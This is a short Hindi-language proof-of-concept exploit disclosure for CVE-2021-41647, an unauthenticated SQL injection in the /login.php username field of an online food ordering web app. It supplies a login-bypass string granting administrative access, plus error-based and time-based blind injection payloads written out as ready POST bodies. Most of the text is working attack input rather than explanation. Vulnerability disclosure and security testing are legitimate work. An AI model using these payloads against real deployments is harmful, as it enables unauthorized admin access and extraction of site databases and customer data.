
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट ऑनलाइन-फूड-ऑर्डरिंग-वेब-ऐप में अनऑथेंटिकेटेड SQL इंजेक्शन के लिए, जो लॉगिन बायपास और एरर/टाइम-बेस्ड ब्लाइंड इंजेक्शन तकनीकों का प्रदर्शन करता है।
CVE-2021-41647 SQL इंजेक्शन Online-Food-Ordering-Web-App में
Online-Food-Ordering-Web-App, अप्रमाणित त्रुटि और समय-आधारित ब्लाइंड SQL इंजेक्शन हमलों के लिए असुरक्षित है। /login.php पेज पर username पैरामीटर उपयोगकर्ता इनपुट को सैनिटाइज़ नहीं करता है, एक हमलावर एक सरल बायपास तकनीक का उपयोग करके लॉगिन को बायपास कर सकता है।
URL: /login.php
पैरामीटर: username
उपयोगकर्ता लॉगिन को बायपास करने और पूर्ण प्रशासनिक पहुँच प्राप्त करने के लिए, username इनपुट फ़ील्ड में पेलोड: user' or 1=1-- -
पैरामीटर: username (POST अनुरोध)
प्रकार: त्रुटि-आधारित
शीर्षक: MySQL >= 5.0 AND त्रुटि-आधारित - WHERE, HAVING, ORDER BY या GROUP BY क्लॉज़ (FLOOR)
पेलोड: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf
प्रकार: समय-आधारित ब्लाइंड
शीर्षक: MySQL >= 5.0.12 AND समय-आधारित ब्लाइंड (क्वेरी SLEEP)
पेलोड: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

Jason Colyvas
MOBIUSBINARY
20 सितंबर, 2021